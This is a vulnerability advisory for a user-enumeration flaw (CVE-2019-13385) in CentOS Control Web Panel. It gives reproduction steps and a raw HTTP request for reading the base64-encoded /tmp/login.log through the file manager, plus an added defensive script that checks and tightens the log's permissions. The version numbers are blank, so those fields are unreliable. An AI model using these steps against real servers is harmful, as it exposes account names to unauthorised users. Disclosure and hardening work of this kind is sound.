CentOS Control Web Panel User Enumeration

CentOS Control Web Panel (CWP) versions through suffer from a user enumeration vulnerability.

MD5 | b641e3a461a0d2b4932c082c36d4a365

# Exploit Title: CWP (CentOS Control Web Panel) User Enumeration
# Date: 23 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: to
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13385

# Description:

An attacker who has access as a low-privilege user can enumerate the active users on the system by reading a log file.
The access log is stored in the /tmp directory with its content encoded in base64; the encoding does not prevent any local user who can read the file from decoding it.
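A defender-side check for this issue, added here and not part of the advisory: it audits whether the CWP login log can be read by other local accounts (the actual weakness, since base64 is an encoding and not an access control) and restricts it to owner-only access. The path /tmp/login.log comes from the advisory; the function names and the constructed sample log are assumptions made for this example.

```python
import base64
import os
import stat
import tempfile

# Path named in the advisory: CWP keeps its login log under /tmp, base64-encoded.
DEFAULT_LOG_PATH = "/tmp/login.log"


def audit_login_log(path=DEFAULT_LOG_PATH):
    """Return a list of findings explaining why `path` exposes user activity.

    Base64 gives no confidentiality, so the only effective control is the
    file's ownership and mode plus the directory it lives in.
    """
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings  # nothing on disk, nothing to expose
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IROTH:
        findings.append("world-readable (mode %o): any local user can read and decode it" % mode)
    elif mode & stat.S_IRGRP:
        findings.append("group-readable (mode %o): review members of gid %d" % (mode, st.st_gid))
    parent = os.path.dirname(os.path.abspath(path))
    if stat.S_IMODE(os.stat(parent).st_mode) & stat.S_IWOTH:
        findings.append("stored under world-writable directory %s" % parent)
    return findings


def harden_login_log(path):
    """Restrict the log to its owner (0600) and return the resulting mode."""
    os.chmod(path, 0o600)
    return stat.S_IMODE(os.stat(path).st_mode)


def make_sample_log():
    """Write a constructed, base64-encoded log (not CWP's real format) with the
    permissive mode a low-privilege user could exploit, and return its path."""
    path = os.path.join(tempfile.mkdtemp(), "login.log")
    record = base64.b64encode(b"2019-07-03 user1 login ok").decode() + "\n"
    with open(path, "w") as fh:
        fh.write(record)
    os.chmod(path, 0o644)  # world-readable, as the advisory describes
    return path


if __name__ == "__main__":
    sample = make_sample_log()
    print("before:", audit_login_log(sample))
    print("after hardening: mode %o, findings %s" % (harden_login_log(sample), audit_login_log(sample)))
```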

# Steps to Reproduce

1. Log in as a low-privilege user.
2. Browse to https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/username/fileManager2.php?frame=3&fm_current_dir=/tmp///
3. The login log is the file login.log, whose content is base64-encoded.


GET /cwp_70b80498fb4cb150/user1/fileManager2.php?frame=3&fm_current_dir=/tmp/// HTTP/1.1
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en,th-TH;q=0.9,th;q=0.8

# PoC


# Timeline
2019-07-03: Discovered the bug
2019-07-03: Reported to vendor
2019-07-04: Vendor accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-23: Published

# Discovered by
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak
